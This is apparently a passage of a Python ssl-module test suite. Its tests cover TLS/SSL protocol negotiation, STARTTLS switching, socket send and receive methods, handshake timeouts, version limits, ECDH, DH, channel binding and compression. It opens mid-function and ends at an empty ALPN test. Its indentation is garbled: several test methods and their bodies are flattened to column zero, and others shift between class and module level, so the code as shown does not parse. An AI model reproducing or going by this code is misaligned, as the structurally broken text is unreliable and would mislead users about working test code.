            try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
        try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
        try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
        # Server with specific SSL options
        if hasattr(ssl, 'PROTOCOL_SSLv3'):
            try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
                               server_options=ssl.OP_NO_SSLv3)
        # Will choose TLSv1
        try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
                           server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
        try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
                           server_options=ssl.OP_NO_TLSv1)
    @unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
                         "OpenSSL is compiled without SSLv3 support")
    def test_protocol_sslv3(self):
        """Connecting to an SSLv3 server with various client options"""
        if support.verbose:
            sys.stdout.write("\n")
        # SSLv3<->SSLv3 at every certificate requirement level.
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
        # Mismatched protocols must fail.
        if hasattr(ssl, 'PROTOCOL_SSLv2'):
            try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
                           client_options=ssl.OP_NO_SSLv3)
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
        if no_sslv2_implies_sslv3_hello():
            # No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
            try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
                               False, client_options=ssl.OP_NO_SSLv2)
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
    @unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
                         "TLS version 1.1 not supported.")
    def test_protocol_tlsv1_1(self):
        """Connecting to a TLSv1.1 server with various client options.
           Testing against older TLS versions."""
        if support.verbose:
            sys.stdout.write("\n")
        try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
        # Legacy SSL protocols must be rejected.
        if hasattr(ssl, 'PROTOCOL_SSLv2'):
            try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
        if hasattr(ssl, 'PROTOCOL_SSLv3'):
            try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
        try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
                           client_options=ssl.OP_NO_TLSv1_1)
        # An auto-negotiating client settles on TLSv1.1; strict version
        # mismatches in either direction must fail.
        try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
        try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
        try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
    @unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
                         "TLS version 1.2 not supported.")
    def test_protocol_tlsv1_2(self):
        """Connecting to a TLSv1.2 server with various client options.
           Testing against older TLS versions."""
        if support.verbose:
            sys.stdout.write("\n")
        try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
                           server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
                           client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
        # Legacy SSL protocols must be rejected.
        if hasattr(ssl, 'PROTOCOL_SSLv2'):
            try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
        if hasattr(ssl, 'PROTOCOL_SSLv3'):
            try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
        try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
                           client_options=ssl.OP_NO_TLSv1_2)
        # An auto-negotiating client settles on TLSv1.2; strict version
        # mismatches in either direction must fail.
        try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
        try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
        try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
        try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
        try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
    def test_starttls(self):
        """Switching from clear text to encrypted and back again."""
        # Mixed-case messages verify which side of the wrap boundary the
        # echo (lower-casing) happened on.
        msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
        server = ThreadedEchoServer(CERTFILE,
                                    starttls_server=True,
                                    chatty=True,
                                    connectionchatty=True)
        # `wrapped` tracks whether the connection is currently TLS.
        wrapped = False
        with server:
            s = socket.socket()
            s.setblocking(1)
            s.connect((HOST, server.port))
            if support.verbose:
                sys.stdout.write("\n")
            for indata in msgs:
                if support.verbose:
                    sys.stdout.write(
                        " client: sending %r...\n" % indata)
                if wrapped:
                    conn.write(indata)
                    outdata = conn.read()
                else:
                    s.send(indata)
                    outdata = s.recv(1024)
                msg = outdata.strip().lower()
                if indata == b"STARTTLS" and msg.startswith(b"ok"):
                    # STARTTLS ok, switch to secure mode
                    if support.verbose:
                        sys.stdout.write(
                            " client: read %r from server, starting TLS...\n"
                            % msg)
                    conn = test_wrap_socket(s)
                    wrapped = True
                elif indata == b"ENDTLS" and msg.startswith(b"ok"):
                    # ENDTLS ok, switch back to clear text
                    if support.verbose:
                        sys.stdout.write(
                            " client: read %r from server, ending TLS...\n"
                            % msg)
                    s = conn.unwrap()
                    wrapped = False
                else:
                    if support.verbose:
                        sys.stdout.write(
                            " client: read %r from server\n" % msg)
            if support.verbose:
                sys.stdout.write(" client: closing connection.\n")
            # Say goodbye over whichever transport is currently active.
            if wrapped:
                conn.write(b"over\n")
            else:
                s.send(b"over\n")
            if wrapped:
                conn.close()
            else:
                s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
    def test_asyncore_server(self):
        """Check the example asyncore integration."""
        if support.verbose:
            sys.stdout.write("\n")
        indata = b"FOO\n"
        server = AsyncoreEchoServer(CERTFILE)
        with server:
            s = test_wrap_socket(socket.socket())
            s.connect(('127.0.0.1', server.port))
            if support.verbose:
                sys.stdout.write(
                    " client: sending %r...\n" % indata)
            s.write(indata)
            outdata = s.read()
            if support.verbose:
                sys.stdout.write(" client: read %r\n" % outdata)
            # The asyncore echo server lower-cases the payload.
            if outdata != indata.lower():
                self.fail(
                    "bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
                    % (outdata[:20], len(outdata),
                       indata[:20].lower(), len(indata)))
            s.write(b"over\n")
            if support.verbose:
                sys.stdout.write(" client: closing connection.\n")
            s.close()
            if support.verbose:
                sys.stdout.write(" client: connection closed.\n")
    def test_recv_send(self):
        """Test recv(), send() and friends."""
        if support.verbose:
            sys.stdout.write("\n")
        server = ThreadedEchoServer(CERTFILE,
                                    certreqs=ssl.CERT_NONE,
                                    ssl_version=ssl.PROTOCOL_TLS_SERVER,
                                    cacerts=CERTFILE,
                                    chatty=True,
                                    connectionchatty=False)
        with server:
            s = test_wrap_socket(socket.socket(),
                                 server_side=False,
                                 certfile=CERTFILE,
                                 ca_certs=CERTFILE,
                                 cert_reqs=ssl.CERT_NONE,
                                 ssl_version=ssl.PROTOCOL_TLS_CLIENT)
            s.connect((HOST, server.port))
            # helper methods for standardising recv* method signatures
            def _recv_into():
                b = bytearray(b"\0"*100)
                count = s.recv_into(b)
                return b[:count]
            def _recvfrom_into():
                b = bytearray(b"\0"*100)
                count, addr = s.recvfrom_into(b)
                return b[:count]
            # (name, method, expect success?, *args, return value func)
            send_methods = [
                ('send', s.send, True, [], len),
                ('sendto', s.sendto, False, ["some.address"], len),
                ('sendall', s.sendall, True, [], lambda x: None),
            ]
            # (name, method, whether to expect success, *args)
            recv_methods = [
                ('recv', s.recv, True, []),
                ('recvfrom', s.recvfrom, False, ["some.address"]),
                ('recv_into', _recv_into, True, []),
                ('recvfrom_into', _recvfrom_into, False, []),
            ]
            data_prefix = "PREFIX_"
            # Address-taking variants (sendto/recvfrom*) must raise
            # ValueError on an SSL socket; the rest must round-trip.
            for (meth_name, send_meth, expect_success, args,
                    ret_val_meth) in send_methods:
                indata = (data_prefix + meth_name).encode('ascii')
                try:
                    ret = send_meth(indata, *args)
                    msg = "sending with {}".format(meth_name)
                    self.assertEqual(ret, ret_val_meth(indata), msg=msg)
                    outdata = s.read()
                    if outdata != indata.lower():
                        self.fail(
                            "While sending with <<{name:s}>> bad data "
                            "<<{outdata:r}>> ({nout:d}) received; "
                            "expected <<{indata:r}>> ({nin:d})\n".format(
                                name=meth_name, outdata=outdata[:20],
                                nout=len(outdata),
                                indata=indata[:20], nin=len(indata)
                            )
                        )
                except ValueError as e:
                    if expect_success:
                        self.fail(
                            "Failed to send with method <<{name:s}>>; "
                            "expected to succeed.\n".format(name=meth_name)
                        )
                    if not str(e).startswith(meth_name):
                        self.fail(
                            "Method <<{name:s}>> failed with unexpected "
                            "exception message: {exp:s}\n".format(
                                name=meth_name, exp=e
                            )
                        )
            for meth_name, recv_meth, expect_success, args in recv_methods:
                indata = (data_prefix + meth_name).encode('ascii')
                try:
                    s.send(indata)
                    outdata = recv_meth(*args)
                    if outdata != indata.lower():
                        self.fail(
                            "While receiving with <<{name:s}>> bad data "
                            "<<{outdata:r}>> ({nout:d}) received; "
                            "expected <<{indata:r}>> ({nin:d})\n".format(
                                name=meth_name, outdata=outdata[:20],
                                nout=len(outdata),
                                indata=indata[:20], nin=len(indata)
                            )
                        )
                except ValueError as e:
                    if expect_success:
                        self.fail(
                            "Failed to receive with method <<{name:s}>>; "
                            "expected to succeed.\n".format(name=meth_name)
                        )
                    if not str(e).startswith(meth_name):
                        self.fail(
                            "Method <<{name:s}>> failed with unexpected "
                            "exception message: {exp:s}\n".format(
                                name=meth_name, exp=e
                            )
                        )
                    # consume data
                    s.read()

            # read(-1, buffer) is supported, even though read(-1) is not
            data = b"data"
            s.send(data)
            buffer = bytearray(len(data))
            self.assertEqual(s.read(-1, buffer), len(data))
            self.assertEqual(buffer, data)

            # sendall accepts bytes-like objects
            if ctypes is not None:
                ubyte = ctypes.c_ubyte * len(data)
                byteslike = ubyte.from_buffer_copy(data)
                s.sendall(byteslike)
                self.assertEqual(s.read(), data)

            # Make sure sendmsg et al are disallowed to avoid
            # inadvertent disclosure of data and/or corruption
            # of the encrypted data stream
            self.assertRaises(NotImplementedError, s.dup)
            self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
            self.assertRaises(NotImplementedError, s.recvmsg, 100)
            self.assertRaises(NotImplementedError,
                              s.recvmsg_into, [bytearray(100)])
            s.write(b"over\n")

            # Negative read sizes are rejected outright.
            self.assertRaises(ValueError, s.recv, -1)
            self.assertRaises(ValueError, s.read, -1)

            s.close()
def test_recv_zero(self):
    """recv(0)/read(0) must return b'' immediately, without blocking."""
    server = ThreadedEchoServer(CERTFILE)
    server.__enter__()
    self.addCleanup(server.__exit__, None, None)
    conn = socket.create_connection((HOST, server.port))
    self.addCleanup(conn.close)
    conn = test_wrap_socket(conn, suppress_ragged_eofs=False)
    self.addCleanup(conn.close)

    # A zero-length read returns empty bytes and leaves the echoed
    # payload queued for the next real read.
    conn.send(b"data")
    self.assertEqual(conn.recv(0), b"")
    self.assertEqual(conn.read(0), b"")
    self.assertEqual(conn.read(), b"data")

    # With nothing pending, zero-length reads still must not block.
    conn.setblocking(False)
    self.assertEqual(conn.recv(0), b"")
    self.assertEqual(conn.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
    """Flooding a non-blocking SSL socket eventually raises
    SSLWantWriteError/SSLWantReadError instead of blocking."""
    server = ThreadedEchoServer(CERTFILE,
                                certreqs=ssl.CERT_NONE,
                                ssl_version=ssl.PROTOCOL_TLS_SERVER,
                                cacerts=CERTFILE,
                                chatty=True,
                                connectionchatty=False)
    with server:
        s = test_wrap_socket(socket.socket(),
                             server_side=False,
                             certfile=CERTFILE,
                             ca_certs=CERTFILE,
                             cert_reqs=ssl.CERT_NONE,
                             ssl_version=ssl.PROTOCOL_TLS_CLIENT)
        s.connect((HOST, server.port))
        s.setblocking(False)

        # If we keep sending data, at some point the buffers
        # will be full and the non-blocking call must raise a
        # "want write"/"want read" error rather than blocking.
        buf = bytearray(8192)
        def fill_buffer():
            while True:
                s.send(buf)
        self.assertRaises((ssl.SSLWantWriteError,
                           ssl.SSLWantReadError), fill_buffer)

        # Restore blocking mode and drop the connection; the echoed
        # data is discarded when the socket is closed.
        s.setblocking(True)
        s.close()
def test_handshake_timeout(self):
    """SSL handshake must respect the socket timeout (Issue #5103)."""
    server = socket.socket(socket.AF_INET)
    host = "127.0.0.1"
    port = support.bind_port(server)
    started = threading.Event()
    finish = False

    def serve():
        # Accept TCP connections but never speak TLS, so the client's
        # handshake can only end by timing out.
        server.listen()
        started.set()
        conns = []
        while not finish:
            r, w, e = select.select([server], [], [], 0.1)
            if server in r:
                # Let the socket hang around rather than having
                # it closed by garbage collection.
                conns.append(server.accept()[0])
        for sock in conns:
            sock.close()

    t = threading.Thread(target=serve)
    t.start()
    started.wait()

    try:
        try:
            # Case 1: wrap after connect — handshake runs inside wrap.
            c = socket.socket(socket.AF_INET)
            c.settimeout(0.2)
            c.connect((host, port))
            # Will attempt handshake and time out
            self.assertRaisesRegex(socket.timeout, "timed out",
                                   test_wrap_socket, c)
        finally:
            c.close()
        try:
            # Case 2: wrap before connect — handshake runs inside connect.
            c = socket.socket(socket.AF_INET)
            c = test_wrap_socket(c)
            c.settimeout(0.2)
            # Will attempt handshake and time out
            self.assertRaisesRegex(socket.timeout, "timed out",
                                   c.connect, (host, port))
        finally:
            c.close()
    finally:
        # Signal the server thread to exit its select loop, then
        # join it before releasing the listening socket.
        finish = True
        t.join()
        server.close()
def test_server_accept(self):
    """accept() on an SSLSocket created through SSLContext.wrap_socket()
    (Issue #16357)."""
    context = ssl.SSLContext(ssl.PROTOCOL_TLS)
    context.verify_mode = ssl.CERT_REQUIRED
    context.load_verify_locations(SIGNING_CA)
    context.load_cert_chain(SIGNED_CERTFILE)
    server = socket.socket(socket.AF_INET)
    host = "127.0.0.1"
    port = support.bind_port(server)
    server = context.wrap_socket(server, server_side=True)
    self.assertTrue(server.server_side)

    evt = threading.Event()
    remote = None
    peer = None

    def serve():
        nonlocal remote, peer
        server.listen()
        # Block on the accept and wait on the connection to close.
        evt.set()
        remote, peer = server.accept()
        # Echo the first 4 bytes back to the client.
        remote.send(remote.recv(4))

    t = threading.Thread(target=serve)
    t.start()
    # Client wait until server setup and perform a connect.
    evt.wait()
    client = context.wrap_socket(socket.socket())
    client.connect((host, port))
    client.send(b'data')
    client.recv()
    client_addr = client.getsockname()
    client.close()
    t.join()
    remote.close()
    server.close()
    # Sanity checks: accept() produced a real SSLSocket and reported
    # the client's address.
    self.assertIsInstance(remote, ssl.SSLSocket)
    self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
    """getpeercert() on a never-connected socket raises ENOTCONN."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
    with ctx.wrap_socket(socket.socket()) as unconnected:
        with self.assertRaises(OSError) as caught:
            unconnected.getpeercert()
        self.assertEqual(caught.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
    """do_handshake() on a never-connected socket raises ENOTCONN."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
    with ctx.wrap_socket(socket.socket()) as unconnected:
        with self.assertRaises(OSError) as caught:
            unconnected.do_handshake()
        self.assertEqual(caught.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
    """A handshake with disjoint cipher lists must fail."""
    client_context, server_context, hostname = testing_context()
    # OpenSSL enables all TLS 1.3 ciphers unconditionally; pin the
    # connection to TLS 1.2 so the disjoint lists below take effect.
    client_context.options |= ssl.OP_NO_TLSv1_3
    # Force different suites on client and server.
    client_context.set_ciphers("AES128")
    server_context.set_ciphers("AES256")
    with ThreadedEchoServer(context=server_context) as server:
        with client_context.wrap_socket(socket.socket(),
                                        server_hostname=hostname) as sock:
            with self.assertRaises(OSError):
                sock.connect((HOST, server.port))
    self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
    """
    Basic tests for SSLSocket.version().

    More tests are done in the test_protocol_*() methods.
    """
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    with ThreadedEchoServer(CERTFILE,
                            ssl_version=ssl.PROTOCOL_TLS_SERVER,
                            chatty=False) as server:
        with context.wrap_socket(socket.socket()) as s:
            # Before the handshake there is no SSL object and no version.
            self.assertIs(s.version(), None)
            self.assertIs(s._sslobj, None)
            s.connect((HOST, server.port))
            # Expected version depends on the linked OpenSSL.
            if IS_OPENSSL_1_1_1 and ssl.HAS_TLSv1_3:
                self.assertEqual(s.version(), 'TLSv1.3')
            elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
                self.assertEqual(s.version(), 'TLSv1.2')
            else:  # 0.9.8 to 1.0.1
                self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
        # After close the SSL object is dropped and version() is None again.
        self.assertIs(s._sslobj, None)
        self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
                     "test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
    """Forcing TLS 1.3 negotiates one of the TLS 1.3 AEAD cipher suites."""
    context = ssl.SSLContext(ssl.PROTOCOL_TLS)
    context.load_cert_chain(CERTFILE)
    # Disable every older protocol so only TLS 1.3 can be negotiated.
    context.options |= (
        ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
    )
    with ThreadedEchoServer(context=context) as server:
        with context.wrap_socket(socket.socket()) as s:
            s.connect((HOST, server.port))
            self.assertIn(s.cipher()[0], {
                'TLS_AES_256_GCM_SHA384',
                'TLS_CHACHA20_POLY1305_SHA256',
                'TLS_AES_128_GCM_SHA256',
            })
            self.assertEqual(s.version(), 'TLSv1.3')
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
                     "required OpenSSL 1.1.0g")
def test_min_max_version(self):
    """minimum_version/maximum_version drive protocol negotiation.

    Three scenarios: two overlapping ranges negotiate the highest
    shared version; a disjoint range fails the handshake with an alert.
    """
    client_context, server_context, hostname = testing_context()
    # client TLSv1.0 to 1.2
    client_context.minimum_version = ssl.TLSVersion.TLSv1
    client_context.maximum_version = ssl.TLSVersion.TLSv1_2
    # server only TLSv1.2
    server_context.minimum_version = ssl.TLSVersion.TLSv1_2
    server_context.maximum_version = ssl.TLSVersion.TLSv1_2

    with ThreadedEchoServer(context=server_context) as server:
        with client_context.wrap_socket(socket.socket(),
                                        server_hostname=hostname) as s:
            s.connect((HOST, server.port))
            self.assertEqual(s.version(), 'TLSv1.2')

    # client 1.0 to 1.2, server 1.0 to 1.1
    server_context.minimum_version = ssl.TLSVersion.TLSv1
    server_context.maximum_version = ssl.TLSVersion.TLSv1_1

    with ThreadedEchoServer(context=server_context) as server:
        with client_context.wrap_socket(socket.socket(),
                                        server_hostname=hostname) as s:
            s.connect((HOST, server.port))
            self.assertEqual(s.version(), 'TLSv1.1')

    # client 1.0 only, server 1.2 only (mismatch)
    server_context.minimum_version = ssl.TLSVersion.TLSv1_2
    server_context.maximum_version = ssl.TLSVersion.TLSv1_2
    client_context.maximum_version = ssl.TLSVersion.TLSv1
    # BUG FIX: the original assigned maximum_version twice here; the
    # client's *minimum* must also be pinned to TLSv1 so the client
    # offers exactly one version disjoint from the server's range.
    client_context.minimum_version = ssl.TLSVersion.TLSv1
    with ThreadedEchoServer(context=server_context) as server:
        with client_context.wrap_socket(socket.socket(),
                                        server_hostname=hostname) as s:
            with self.assertRaises(ssl.SSLError) as e:
                s.connect((HOST, server.port))
            self.assertIn("alert", str(e.exception))
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
                     "required OpenSSL 1.1.0g")
@unittest.skipUnless(ssl.HAS_SSLv3, "requires SSLv3 support")
def test_min_max_version_sslv3(self):
    """Pinning both peers down to SSLv3 negotiates exactly SSLv3."""
    client_context, server_context, hostname = testing_context()
    server_context.minimum_version = ssl.TLSVersion.SSLv3
    client_context.minimum_version = ssl.TLSVersion.SSLv3
    client_context.maximum_version = ssl.TLSVersion.SSLv3
    with ThreadedEchoServer(context=server_context) as server:
        with client_context.wrap_socket(socket.socket(),
                                        server_hostname=hostname) as sock:
            sock.connect((HOST, server.port))
            self.assertEqual(sock.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
    """ECDH key exchange should be enabled by default (Issue #21015)."""
    # Issue #21015: elliptic curve-based Diffie Hellman key exchange
    # should be enabled by default on SSL contexts.
    context = ssl.SSLContext(ssl.PROTOCOL_TLS)
    context.load_cert_chain(CERTFILE)
    # TLSv1.3 defaults to PFS key agreement and no longer has KEA in
    # cipher name.
    context.options |= ssl.OP_NO_TLSv1_3
    # Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
    # explicitly using the 'ECCdraft' cipher alias. Otherwise,
    # our default cipher list should prefer ECDH-based ciphers
    # automatically.
    if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
        context.set_ciphers("ECCdraft:ECDH")
    with ThreadedEchoServer(context=context) as server:
        with context.wrap_socket(socket.socket()) as s:
            s.connect((HOST, server.port))
            # The negotiated cipher name must mention ECDH key exchange.
            self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
    """A handshake reports its negotiated compression method."""
    client_context, server_context, hostname = testing_context()
    handshake = server_params_test(client_context, server_context,
                                   chatty=True, connectionchatty=True,
                                   sni_name=hostname)
    negotiated = handshake['compression']
    if support.verbose:
        sys.stdout.write(" got compression: {!r}\n".format(negotiated))
    self.assertIn(negotiated, {None, 'ZLIB', 'RLE'})
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
                     "ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
    """OP_NO_COMPRESSION on both peers yields an uncompressed link."""
    client_context, server_context, hostname = testing_context()
    for ctx in (client_context, server_context):
        ctx.options |= ssl.OP_NO_COMPRESSION
    handshake = server_params_test(client_context, server_context,
                                   chatty=True, connectionchatty=True,
                                   sni_name=hostname)
    self.assertIs(handshake['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
    """An ephemeral Diffie-Hellman connection negotiates a DH cipher."""
    # Check we can get a connection with ephemeral Diffie-Hellman
    client_context, server_context, hostname = testing_context()
    # test scenario needs TLS <= 1.2
    client_context.options |= ssl.OP_NO_TLSv1_3
    server_context.load_dh_params(DHFILE)
    server_context.set_ciphers("kEDH")
    server_context.options |= ssl.OP_NO_TLSv1_3
    stats = server_params_test(client_context, server_context,
                               chatty=True, connectionchatty=True,
                               sni_name=hostname)
    cipher = stats["cipher"][0]
    parts = cipher.split("-")
    if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
        # BUG FIX: `cipher` is already the cipher-name string (see the
        # .split() above); the original `cipher[0]` reported only its
        # first character in the failure message.
        self.fail("Non-DH cipher: " + cipher)
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
    """set_ecdh_curve(): matching curves connect; a mismatch may fail."""
    # server secp384r1, client auto
    client_context, server_context, hostname = testing_context()
    server_context.set_ecdh_curve("secp384r1")
    server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
    server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
    stats = server_params_test(client_context, server_context,
                               chatty=True, connectionchatty=True,
                               sni_name=hostname)

    # server auto, client secp384r1
    client_context, server_context, hostname = testing_context()
    client_context.set_ecdh_curve("secp384r1")
    server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
    server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
    stats = server_params_test(client_context, server_context,
                               chatty=True, connectionchatty=True,
                               sni_name=hostname)

    # server / client curve mismatch
    client_context, server_context, hostname = testing_context()
    client_context.set_ecdh_curve("prime256v1")
    server_context.set_ecdh_curve("secp384r1")
    server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
    server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
    try:
        stats = server_params_test(client_context, server_context,
                                   chatty=True, connectionchatty=True,
                                   sni_name=hostname)
    except ssl.SSLError:
        pass
    else:
        # OpenSSL 1.0.2 does not fail although it should.
        if IS_OPENSSL_1_1_0:
            self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
    """Without ALPN configured, selected_alpn_protocol() is None."""
    client_context, server_context, hostname = testing_context()
    handshake = server_params_test(client_context, server_context,
                                   chatty=True, connectionchatty=True,
                                   sni_name=hostname)
    self.assertIs(handshake['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
    """Server-side ALPN alone still leaves the client's protocol None."""
    client_context, server_context, hostname = testing_context()
    server_context.set_alpn_protocols(['foo', 'bar'])
    handshake = server_params_test(client_context, server_context,
                                   chatty=True, connectionchatty=True,
                                   sni_name=hostname)
    self.assertIs(handshake['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
    """ALPN negotiation across several client offers, incl. no overlap."""
